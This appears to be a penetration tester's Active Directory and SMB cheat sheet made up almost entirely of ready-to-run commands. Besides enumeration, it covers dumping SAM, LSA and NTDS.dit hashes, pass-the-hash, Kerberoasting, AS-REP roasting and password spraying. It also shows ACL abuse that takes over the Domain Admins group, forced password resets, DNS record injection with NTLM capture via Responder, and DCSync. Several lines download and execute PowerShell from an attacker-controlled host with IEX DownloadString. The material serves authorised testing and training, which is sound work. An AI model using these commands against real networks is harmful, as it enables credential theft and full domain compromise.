Active Directory / SMB
SMB Enumeration for Windows
Last updated
SMB Enumeration for Windows
Last updated
Whatever account ends with $ sign that means it ether a machine account
or a manage service account
.
SID structure.
## ------------------| Generate NTLM hashes using password
iconv -f ASCII -t UTF-16LE <(printf "<Password>") | openssl dgst -md4
objectSid
to SID
representation
import sys
import base64
import struct
def convert(binary):
version = struct.unpack('B', binary[0:1])[0]
# I do not know how to treat version != 1 (it does not exist yet)
assert version == 1, version
length = struct.unpack('B', binary[1:2])[0]
authority = struct.unpack(b'>Q', b'\x00\x00' + binary[2:8])[0]
string = 'S-%d-%d' % (version, authority)
binary = binary[8:]
assert len(binary) == 4 * length
for i in range(length):
value = struct.unpack('<L', binary[4*i:4*(i+1)])[0]
string += '-%d' % value
return string
print(base64.b64decode(sys.argv[1]))
##python3 binary2SID.py <base64==>
Basic commands
## ------------------| Joined/Connect to domain?
##[Windows]
systeminfo | findstr /B "Domain"
### If you see something other than Domain: WORKGROUP, then you are likely joined to a domain
##[Linux]
ls -al /etc/krb5.conf
kinit -k host/$(hostname -f)
## ------------------| Enumerating Domain Admins
net group "Domain Admins" /domain
## ------------------| Enumerating server admins
net group "Server_Admin" /domain
## ------------------| List all users on entire domain
net user /domain
## ------------------| List all groups
net group /domain
## ------------------| List groups for h4rith user
net user h4rith /domain
## ------------------| Current domain info
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
## ------------------| Domain trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
## ------------------| Current forest info
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
## ------------------| Get forest trust relationships
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()
## ------------------| Get DCs of a domain
nltest /dclist:offense.local
net group "domain controllers" /domain
## ------------------| Get DC for currently authenticated session
nltest /dsgetdc:offense.local
## ------------------| Get domain trusts from cmd shell
nltest /domain_trusts
## ------------------| Get user info
nltest /user:"spotless"
## ------------------| List smb shares
Get-SmbShare
Get-SmbShare -Name C$ | select *
## ------------------| Creating a new file share
New-SmbShare -Name <ShareName> -Description "This is description" -Path C:\Shares\<ShareName>
## ------------------| Modifying share properties
Set-SmbShare -Name <ShareName> -Description "This is description" -Force
## ------------------| Granting file share permissions.
Grant-SmbShareAccess -Name <ShareName> -AccountName <DOMAIN>\<USER> -AccessRight Full -Force
## You can use Everyone insted of <DOMAIN>\<USER>
## You can use Read,Change,Custom insted of Full.
## ------------------| Removing file share permissions
Revoke-SmbShareAccess -Name <ShareName> -AccountName <DOMAIN>\<USER> -Force
## You can use Everyone insted of <DOMAIN>\<USER>
## ------------------| Denying permissions to a file share
Block-SmbShareAccess -Name <ShareName> -AccountName <DOMAIN>\<USER> -Force
UnBlock-SmbShareAccess -Name <ShareName> -AccountName <DOMAIN>\<USER> -Force
## You can use Everyone insted of <DOMAIN>\<USER
## ------------------| Removing a file share
Remove-SmbShare -Name <ShareName> -Force
## ------------------| Get DC for currently authenticated session
set l
## ------------------| Get domain name and DC the user authenticated to
klist
## ------------------| Get all logon sessions. Includes NTLM authenticated sessions
klist sessions
## ------------------| Kerberos tickets for the session
klist
## ------------------| Kached krbtgt
klist tgt
## ------------------| Whoami on older Windows systems
set u
## ------------------| Find DFS shares with ADModule
Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=offense,DC=local" | select name
## ------------------| Find DFS shares with ADSI
$s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,DC=offense,DC=local"; $s.FindAll() | % {$_.properties.name}
## ------------------| Check if spooler service is running on a host
powershell ls "\\dc01\pipe\spoolss"
Find GPP Passwords in SYSVOL
## ------------------| Manual
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
findstr /S /I cpassword \\<DOMAIN>\sysvol\<DOMAIN>\policies\*.xml
## ------------------| PowerSploit
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1
IEX(New-Object Net.WebClient).DownloadString('http://<IP>/Get-GPPPassword.ps1')
Get-GPPPassword
List of groups.
## ------------------| Add to the Remote Desktop Users
net localgroup "Remote Desktop Users" harith /add
## ------------------| Add to the WinRM Users
net localgroup "Remote Management Users" harith /add
## ------------------| Add to the Administrator group
net localgroup "Administrators" harith /add
Find smb version
sudo tcpdump -s0 -n -i tun0 src $IP and port 139 -A -c 10 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.'
sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]' port 139
smbclient -L //$IP
## ------------------| List all
smbclient -N -L //<IP>
## ------------------| For old smba versions
smbclient -N //<IP>/ --option='client min protocol=NT1'
## ------------------| Download all files
smbclient -N //<IP>/<SHARENAME> -U <USERNAME> -c "prompt OFF;recurse ON;mget *"
## ------------------| Login to the user
smbclient -U '<UserName>%<Password> \\\\10.10.10.178\\c$
## ------------------| List info about
## if it has ACL:Everyone:ALLOWED/OI|CI/FULL we can write/read
smbcacls -N //10.10.10.103/Department /Users
## ------------------| Enumarate hosts
nxc smb 192.168.3.201-203
## ------------------| Tricks
## nxc try to authenticate to domain account instead of local user accounts in default
## so use -d WORKGROUP to try with local user account
## ------------------| Enumarate shares / Basic info
nxc smb 10.10.10.178
nxc smb 10.10.10.161 --shares
nxc smb 10.10.10.161 -u '' -p '' --shares
nxc smb 10.10.10.161 -u 'DoseNotExist' -p '' --shares
nxc smb 10.10.10.161 -u 'DoseNotExist' -H <NThash>
nxc smb 10.10.10.161 -d WORKGROUP -u 'DoseNotExist' -H <NThash>
## ------------------| Enumerate active sessions
nxc smb 10.10.10.161 -u UserName -p 'Password' --sessions
## ------------------| Enumerate disks
nxc smb 10.10.10.161 -u UserName -p 'Password' --disks
## ------------------| Enumerate logged on users
nxc smb 10.10.10.161 -u UserName -p 'Password' --loggedon-users
## ------------------| Enumerate domain users
nxc smb 10.10.10.161 -u UserName -p 'Password' --users
## ------------------| Enumerate users by bruteforcing RID
nxc smb 10.10.10.161 -u UserName -p 'Password' --rid-brute
## ------------------| Enumerate domain groups
nxc smb 10.10.10.161 -u UserName -p 'Password' --groups
## ------------------| Enumerate local groups
nxc smb 10.10.10.161 -u UserName -p 'Password' --local-groups
## ------------------| Identify SMB Signing Disabled
nxc smb --gen-relay-list output.txt 10.10.10.0/24
## ------------------| Enumarate password policy
## if Account Lockout Threshold: None; we can bruteforce
nxc smb 10.10.10.161 --pass-pol
nxc smb 10.10.10.161 -u '' -p '' --pass-pol
## ------------------| Dump SAM/LSA/NTDS.dit
nxc smb 10.10.10.161 -u UserName -p 'Password' --sam
nxc smb 10.10.10.161 -u UserName -p 'Password' --lsa
nxc smb 10.10.10.161 -u UserName -p 'Password' --ntds
nxc smb 10.10.10.161 -u UserName -p 'Password' --ntds vss
## ------------------| Execute Commands
## PowerShell
nxc winrm 10.10.10.169 -u melanie -p 'Welcome123!' -X "whoami /all"
## CMD
nxc winrm 10.10.10.169 -u melanie -p 'Welcome123!' -x "whoami /all"
## ------------------| Crawling shares
nxc smb 10.10.10.149 -u 'username' -p 'PassW0rd' -M spider_plus
## ------------------| List shares
smbmap -H 10.10.10.178
smbmap -u 'anonymous' -H 10.10.10.134
smbmap -u 'anonymous' -p 'anonymous' -H 10.10.10.134
## ------------------| Recursively list
smbmap -R directory -H 10.10.10.100
## ------------------| Download file
smbmap -R directory -H 10.10.10.100 -A filename.txt -q
General flag
-H HOST IP of host
--host-file FILE File containing a list of hosts
-u USERNAME Username, if omitted null session assumed
-p PASSWORD Password or NTLM hash
--prompt Prompt for a password
-s SHARE Specify a share (default C$), ex 'C$'
-d DOMAIN Domain name (default WORKGROUP)
-P PORT SMB port (default 445)
-v Return the OS version of the remote host
-x COMMAND Execute a command ex. 'ipconfig /all'
-L List all drives on the specified host (requires ADMIN)
-R [PATH] Recursively list dirs.
-r [PATH] List contents of directory.
-g FILE Output to a file in a grep friendly format,
--dir-only List only directories, ommit files.
--depth DEPTH Traverse a directory tree to a specific depth.
--download PATH Download a file from the remote system,
--upload Upload a file to the remote system ex.
--delete PATH Delete a remote file, ex. 'C$\temp\msf.exe'
--skip Skip delete file confirmation prompt
## ------------------| Login as user
rpcclient -U 'support' <IP>
rpcclient -U 'Administrator:Password' <IP>
## ------------------| Null auth
rpcclient -U '' <IP>
## ------------------| Enumarations
lookupnames Guest
enumdomusers
queryuser 0x450
enumprinters
## ------------------| Change users password
setuserinfo2 <UserAccount> 23 '<Password>'
## ------------------| Brute Forcing User RIDs
for i in $(seq 500 1100);do rpcclient -N -U "" <IP> -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
impacket-samrdump <IP>
## ------------------| Normal Usage
evil-winrm -u UserName -p Password -i 10.10.10.149
evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
## ------------------| With SSL (port 5986)
evil-winrm -S -i 10.10.10.103 -c amanda.cer -k amanda.key -P 5986
evil-winrm -S -i 10.10.10.103 -c amanda.cer -k amanda.key -u amanda -P 5986
## If get message like "The term 'Invoke-Expression' is not recognized as the name of a cmdlet"
## The the language is constrained in the remote computer. Try this!!!
sudo apt-get install gss-ntlmssp
pwsh
$pass = ConvertTo-SecureString '<PassWord>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<ACCOUNT_NAME>', $pass)
Enter-PSSession --ComputerName <IP> -credential $cred -Authentication Negotiate
## ------------------| Enable access to $ADMIN C$, IP$ (Windows Administrative Shares)
REG add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
## ------------------| If we have R&W on SMB shares
impacket-psexec HTB/James:'J@m3s_P@ssW0rd!'@10.10.10.52
## ------------------| If you have NTML Hash [PassTheHash]
impacket-psexec [email protected] -hashes <HASH>:<HASH>
If you are in AD environment
## ------------------| Import ad module
Get-Module -Name ActiveDirectory -ListAvailable
Import-Module -Name ActiveDirectory
## ------------------| List all users + computer
Get-ADObject -LDAPFilter "(objectClass=user)"
Get-ADObject -LDAPFilter "(objectCategory=user)"
Get-ADObject -LDAPFilter "(&(!(objectClass=computer)(objectCategory=user)))"
## ------------------| List all users which start account name with h
Get-ADObject -LDAPFilter "(sAMAccountName=j*)"
Get-ADObject -LDAPFilter "(sAMAccountName=j*)" -Properties cn,objectSid,description,givenname,sn
## ------------------| List all users which has SPN (Service Principle Name) set;GetUserSPns
Get-ADObject -LDAPFilter "(servicePrincipalName=*)"
Get-ADObject -LDAPFilter "(servicePrincipalName=*)" -Properties servicePrincipalName
Microsoft ActiveDirectory PowerShell ADModule
## ------------------| Setup
wget https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1
wget https://github.com/samratashok/ADModule/raw/master/Microsoft.ActiveDirectory.Management.dll
## First you need to import the dll file [Use Absolute Path or .\Microsoft.ActiveDirectory.Management.dll]
Import-Module C:\Full\Path\Microsoft.ActiveDirectory.Management.dll -Verbose
# or : Import-ActiveDirectory -ActiveDirectoryModule C:\Full\Path\Microsoft.ActiveDirectory.Management.dll
. .\Import-ActiveDirectory.ps1
Get-Command -Module ActiveDirectory
## ------------------| Basic Doamin Enum
Get-ADDomain # List current domain
Get-ADDomain -Identity <DomainName> # List other domain info
(Get-ADDomain).DomainSID # List domain SID value
Get-ADDomainController # List domain controllers
Get-ADDomainController -DomainName <Domain> -Discover
## ------------------| User Enumaration
Get-ADUser -Filter * -Properties *
Get-ADUser -Identity <UserName> -Properties *
Get-ADUser -Filter * -Properties * | select Name
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Properties | select Name
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description
## ------------------| Computer Enumaration
Get-ADComputer -Filter * | select Name
Get-ADComputer -Filter 'OperatingSystem -like "*Windows*"' -Properties OperatingSystem | select Name,OperatingSystem
Get-ADComputer "<ComputerName>" βProperties * | Format-Table OperatingSystem,OperatingSystemVersion,OperatingSystemServicePack
## ------------------| Domain Group Enumaration
Get-ADGroup -Filter * | select name
Get-ADGroup -Filter * -Properties *
Get-ADGroup -Filter 'Name -like "*admin*"' | select name
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADPrincipalGroupMembership -Identity <UserName>
## ------------------| Enumerate Organizational units [OUs]
Get-ADOrganizationalUnit -Filter * -Properties * | select name
## ------------------| Enumerate ACL
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=<Domain>').Access
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=<Domain>').Access | select IdentityReference,ActiveDirectoryRights | fl
## ------------------| Enumerate Domain Trusts
Get-ADTrust -Filter *
Get-ADTrust -Identity <FQDN>
## ------------------| Enumerate Domain Forests
Get-ADForest
(Get-ADForest).Domains
Get-ADForest -Identity <FQDN>
Get-ADForest | select -ExpandProperty GlobalCatalogs
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'
Common
## ------------------| Load the script remotely & locally
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/PowerView.ps1')
Import-Module .\PowerView.ps1
. .\PowerView.ps1
## ------------------| Enumerate Current Domain
Get-Domain
Get-Domain -Domain <DomainName>
Get-DomainSID
## ------------------| Enumerate Domain Controllers
Get-DomainController
Get-DomainController -Domain <DomainName>
## ------------------| Enumerate Domain Computers
Get-NetComputer
Get-NetComputer | select name
Get-NetComputer | select Name,operatingsystem
Get-NetComputer -OperatingSystem "*Server 2016*" | select name,operatingsystem
## ------------------| Enumerate Domain Users
Get-DomainUser
Get-DomainUser -Identity <username>
Get-DomainUser | select cn
Get-DomainUser | select samaccountname,logoncount,lastlogon
Get-DomainUser -Identity <username> -Properties DisplayName, MemberOf,objectsid,useraccountcontrol | Format-List
## ------------------| Enumerate All Groups
Get-NetGroup
Get-NetGroup | select name
Get-NetGroup 'Domain Admins'
Get-NetGroup "*admin*"| select name
Get-NetGroup -Domain <targetdomain> | select name
Get-NetGroupMember "Domain Admins" -Recurse | select MemberName
## ------------------| Enumerate Local Groups
Get-NetLocalGroup
Get-NetLocalGroup | Select-Object GroupName
Get-NetLocalGroup -ComputerName <computername>
Get-NetGroup -UserName <"username">| select name
Get-NetGroupMember -MemberName "domain admins" -Recurse | select MemberName
Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain
## ------------------| Enumerate Domain Policy
Get-DomainPolicy
(Get-DomainPolicy)."SystemAccess"
(Get-DomainPolicy)."kerberospolicy"
(Get-DomainPolicy -domain <DomainName>)."SystemAccess"
## ------------------| Enumerate Group Policy [GPO]
Get-NetGPO
Get-NetGPO | select displayname
Get-NetGPO -ComputerName <ComputeName>
Find-GPOComputerAdmin -ComputerName <ComputeName>
Find-GPOLocation -UserName <UserName> -Verbose
## ------------------| Enumerate Organizational Units [OUs]
Get-NetOU
Get-NetOU | select distinguishedname
## ------------------| Enumerate ACL
Invoke-ACLScanner -ResolveGUIDs # Time-consuming
Get-ObjectAcl -Identity <UserName> -ResolveGUIDs
Get-ObjectAcl -SamAccountName <UserName> -ResolveGUIDs
Get-ObjectAcl -SamAccountName <UserName> -ResolveGUIDs | select ObjectDN,ActiveDirectoryRights | fl
## ------------------| Enumerate Domain Trusts
Get-DomainTrust
Get-DomainTrust -Domain <FQDN>
## ------------------| Enumerate Domain Forests
Get-Forest
Get-ForestTrust
Get-ForestDomain
Get-ForestGlobalCatalog
Get-Forest -Forest <Domain>
Get-ForestTrust -Forest <Domain>
Get-ForestDomain -Forest <Domain>
Get-ForestGlobalCatalog -Forest <Domain>
## ------------------| List Domain or File Shares.
Find-DomainShare
Get-NetFileServer -Verbose
Invoke-ShareFinder -Verbose
Find-DomainShare -CheckShareAccess
## ------------------| Find sensitive files on computer in the domain
Invoke-FileFinder -Verbose
## ------------------| Request TGS
Request-SPNTicket
## ------------------| Convert SID value to Name
"SID>" | Convert-SidToName
## ------------------| Kerberoast
Invoke-Kerberoast
Invoke-Kerberoast -Identity <UserName>
## ------------------| Impersonate a user
$pass= ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<Domain>\<User>', $pass)
Invoke-UserImpersonation -Credential $cred
Invoke-RevertToSelf
## ------------------| Special Enumerations
## Find all machines on the domain where current account has local admin access
Find-LocalAdminAccess -Verbose ## Very Noisy
Invoke-EnumerateLocalAdmin -Verbose ## Need Admin Prv
## List all Logged / Active on users
Get-NetLoggedon
Get-NetLoggedon -ComputerName <TargetMachineName> | Format-Table -AutoSize
Get-NetSessiom -ComputerName <DCName> | Format-Table -AutoSize
## List all Service Accounts [SPNs]
Get-NetUser βSPN
Get-NetUser | Where-Object {$_.servicePrincipalName} | select samaccountname,serviceprincipalname | fl
## List all Accounts with Kerberos pre-auth disabled [AS-REP Roasting]
Get-DomainUser -PreauthNotRequired -Verbose
## Find all computers which has sessions
Invoke-UserHunter
Invoke-UserHunter -Stealth ## Only target high value machines
Invoke-UserHunter -CheckAccess
Invoke-UserHunter -GroupName "Domain Admins"
Abusing WriteOwner
## ------------------| Change owner
Set-DomainObjectOwner -Identity <User1> -OwnerIdentity <User2>
## ------------------| Change Rights to reset password
Add-DomainObjectAcl -TargetIdentity Herman -PrincipalIdentity nico -Rights ResetPassword -Verbose
# Password change is listed on PoweShell commands ππ
# ------------------| Change the ownership of group
## The cred isnβt necessary but...
$pass = ConvertTo-SecureString 'W3llcr4ft3d_4cls' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('object.local\maria', $SecPassword)
## Change the ownership of "Domain Admins" group
Set-DomainObjectOwner -Credential $cred -Identity "Domain Admins" -OwnerIdentity maria
## Give all rights to maria
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All
## Maria can add themself to the group
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'
## or net group "Domain Admins" maria /add /domain
net user maria
Abusing ForceChangePassword
## ------------------| Reset password
$pass = ConvertTo-SecureString 'Password123!' -asPlainText -Force
Set-DomainUserPassword <UserName> -AccountPassword $pass -Verbose
## ------------------| Simple Powershell if you are on AD
Set-ADAccountPassword -Identity <UserName> -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force)
Abusing GenericAll
## ------------------| Add member to another group
$pass = ConvertTo-SecureString 'Password123!' -asPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTB\Herman',$pass)
Add-DomainGroupMember -Identity 'Backup_Admins' -Members Herman -Credential $cred
Get-DomainGroup -MemberIdentity Herman | select samaccountname
Abusing GenericWrite
## ------------------| Setup
## The cred isnβt necessary but...
$pass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<Domain>\<UserName>', $pass)
## ------------------| Method I
## Set a service principal name and kerberoast that account.
## To actually Kerberoast, We need to use an SPN with a valid format like MSSQLSvc/<Domain>:1433
Set-DomainObject -Identity <UserNameToSetSPN> -SET @{serviceprincipalname='MSSQLSvc/<Domain>:1433'}
## We can use inbuild binary : setspn -a MSSQLSvc/<Domain>:1433 <Domain>\<UserName>
## With creds : Set-DomainObject -Credential $cred -Identity <UserNameToSetSPN> -SET @{serviceprincipalname='MSSQLSvc/<Domain>:1433'}
Get-DomainUser <UserNameToSetSPN> | Select serviceprincipalname
Get-DomainSPNTicket -SPN "MSSQLSvc/<Domain>:1433" -Credential $cred | fl
.\Rubeus.exe kerberoast /creduser:<Domain>\<UserName> /credpassword:Password123!
## ------------------| Method II
## Setting the logon script
cd C:\Windows\temp\
echo 'whoami > C:\\Windows\\temp\\poc.txt' > foo.ps1
Set-DomainObject -Credential $cred -Identity <UserName> -SET @{scriptpath='C:\\Windows\\temp\\\\foo.ps1'}
Abusing AddKeyCredentialLink
## ------------------| Setup
wget https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_Any/Whisker.exe
.\Whisker.exe add /target:<UserName>
## Then run Rubeus command and get the NTLM hash
evil-winrm -i <IP> -u <UserName> -H <Hash>
impacket-GetADUsers -all -dc-ip <IP> <domain>/<user>
impacket-GetADUsers -all -dc-ip <IP> <domain>/<user> -hashes <LM:NT>
## ------------------| Without password
impacket-GetUserSPNs -request -dc-ip <IP> <domain>/<user> -no-pass
## ------------------| With password
impacket-GetUserSPNs -request -dc-ip <IP> <domain>/<user>:<password>
impacket-GetUserSPNs -request -dc-ip <IP> <domain>/<user> -hashes <LM:NT>
## ------------------| Use Kerberos authentication. Grabs credentials from ccache file
impacket-GetUserSPNs -request -k -no-pass -dc-host dc1.scrm.local scrm.local/ksimpson
## ------------------| Check Kerberos pre-authentication disabled?
impacket-GetNPUsers -dc-ip <IP> <domain>/<user> -no-pass
impacket-GetNPUsers -dc-ip <IP> -no-pass -usersfile /usr/share/seclists/Usernames/Names/names.txt <domain>/
## ------------------| Common
impacket-GetNPUsers -dc-ip <IP> -request '<domain>/'
impacket-GetNPUsers -dc-ip <IP> -request <domain>/<username>:<password>
impacket-GetNPUsers -dc-ip <IP> -request <domain>/<username> -hashes <LM:NT>
## ------------------| Get hashcat format
impacket-GetNPUsers -format hashcat -dc-ip <IP> -request '<domain>/'
## ------------------| Load ShapHound.ps1
## If you are using Powershell script you need to download BloodHound 4.0.3 version
## https://github.com/BloodHoundAD/BloodHound/releases/tag/4.0.3
wget https://raw.githubusercontent.com/BloodHoundAD/BloodHound/d8163c0650ada9ef4a6ebc5e2dc8f5fde566e73f/Collectors/SharpHound.ps1
IEX(New-Object Net.WebClient).DownloadString('http://<IP>/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod All
## ------------------| Collect info
.\SharpHound.exe -c all,GPOLocalGroup,LoggedOn
.\SharpHound.exe -c all -d <DomainName>
.\SharpHound.exe --CollectionMethods all,GPOLocalGroup,LoggedOn
## ------------------| Usage
-s, --searchforest Search all available domains in the forest
--stealth Stealth Collection (Prefer DCOnly whenever possible!)
--outputprefix String to prepend to output file names
--memcache Keep cache in memory and don't write to disk
--zipfilename Filename for the zip
--zippassword Password protects the zip with the specified password
-c, --collectionmethods (Default: Default) Collection Methods: Container, Group, LocalGroup, GPOLocalGroup,
Session, LoggedOn, ObjectProps, ACL, ComputerOnly, Trusts, Default, RDP, DCOM, DCOnly
## ------------------| Run
git clone https://github.com/dirkjanm/BloodHound.py.git && cd BloodHound
python3 bloodhound.py -d <domain> -u <username> -p '<password>' -gc <domain> -c all -ns <IP> --zip --dns-timeout 30
## ------------------| Usage
-u Username. Format: username[@domain]; If the domain is unspecified, the current domain is used.
-p Password
-k Use kerberos
--hashes LM:NLTM hashes
-ns Alternative name server to use for queries
--dns-tcp Use TCP instead of UDP for DNS queries
--dns-timeout DNS query timeout in seconds (default: 3)
-d Domain to query.
-dc Override which DC to query (hostname)
-gc Override which GC to query (hostname)
-w Number of workers for computer enumeration (default: 10)
-v Enable verbose output
BloodHound-Python
## ------------------| Dump domain info
pip3 install bloodhound
bloodhound-python -u <username> -p '<password>' -d <domain> -ns <IP> --dns-tcp -c All --zip
LDAPDomainDump
## ------------------| Only Json output
ldapdomaindump --no-grep --no-html -o ldapinfo <IP> -u <domain>\\<username> -p <password>
## ------------------| Only HTML output
ldapdomaindump --no-json --no-grep -o ldapinfo <IP> -u <domain>\\<username> -p <password>
BloodHound & neo4j raw queries. [source]
## ------------------| List all users
MATCH (u:User) return u
MATCH (u:User) return u LIMIT 10
## ------------------| List users with properties
MATCH (u:User) WHERE u.name CONTAINS "ADMIN" return u.name, u.displayname, u.description
## ------------------| List computers which enable LAPS
MATCH (c:Computer) RETURN c.haslaps, COUNT(*)
## This tool is used to enumerating the domain via LDAP anonymous bind
/opt/windapsearch/windapsearch-linux-amd64 -d <IP> -m users --proxy 127.0.0.1:1080
## ------------------| User Enumarations
kerbrute userenum /usr/share/seclists/Usernames/Names/names.txt -d <domain> --dc <IP>
kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -d <domain> --dc <IP>
## ------------------| Password Spray
kerbrute passwordspray <usernames.txt> -d <domain> --dc <IP> '<password>'
## ------------------| AS-REP Roasting
kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --downgrade -d <domain> --dc <IP> > hashes.out
impacket-rpcdump <IP>
## check if the spooler service is running
impacket-rpcdump <IP> | grep -A2 -B2 MS-RPRN
#One potential service that could be leveraged to escalate privileges in the
#domain is the Spooler service. This service allows triggering authentication as the
#computer account of the host it's running on. This can then be relayed or cracked
## The SharpUp command can be used to run privilege escalation checks
sharpup audit
## The shellcmd grunt command is used to issue shell commands
shellcmd whoami
## Import PowerShell script
PowerShellImport // PowerView.ps1
## Execute powershell script
PowerShell Get-DomainComputer | Select name
## kerberoast the users, MakeToken before run this command
Rubeus kerberoast
Kerberoast <UserName> hashcat
## impersonate (login to user) users using the MakeToken command
MakeToken username domainname password LOGON32_LOGON_INTERACTIVE
## DCSync
DCSync Administrator
## ------------------| Add DNS Record
python3 dnstool.py -u 'intelligence\tiffany.molina' -p <password> -r h4rithd -a add -t A -d <myIP> <RemoteIP>
#### -u intelligence\Tiffany.Molina - The user to authenticate as;
#### -p <password> - The userβs password;
#### --action add - Adding a new record;
#### --record h4rithd - The domain to add;
#### --data <MyIP> - The data to add, in this case, the IP to resolve h4rithd to;
#### --type A - The type of record to add.
## ------------------| Check if it success
nslookup
> server <RemoteIP>
> h4rithd.intelligence.htb
## If it display my ip; we are good!!
## ------------------| Using Responder
sudo responder -I tun0
## ------------------| Using Metasploit
use auxiliary/server/capture/http_ntlm
set SRVPORT 80
set URIPATH /
set SRVHOST <MyIP>
set JOHNPWFILE passwords
run
## ------------------| If it has ReadGMSAPassword
python3 gMSADumper.py -u <user> -p <password_or_LM:NT> -l <ldap_server_ip> -d <domain>
## ------------------| Can verify the hash using crackmapexc
crackmapexec smb 10.10.10.248 -u svc_int$ -H b98d4cef68f72a98dfeed732d1b1abca
^^ If you have the hash; you can genarate a silver ticket.
wget https://raw.githubusercontent.com/fortra/impacket/master/examples/getTGT.py
python3 getTGT.py <domain>/<username>:<password>
export KRB5CCNAME=<username>.ccache
klist
## ------------------| Get Domain SID
impacket-getPac -targetUser Administrator <Domain>/<User>:<Password>
## ------------------| With Rubeus
.\Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat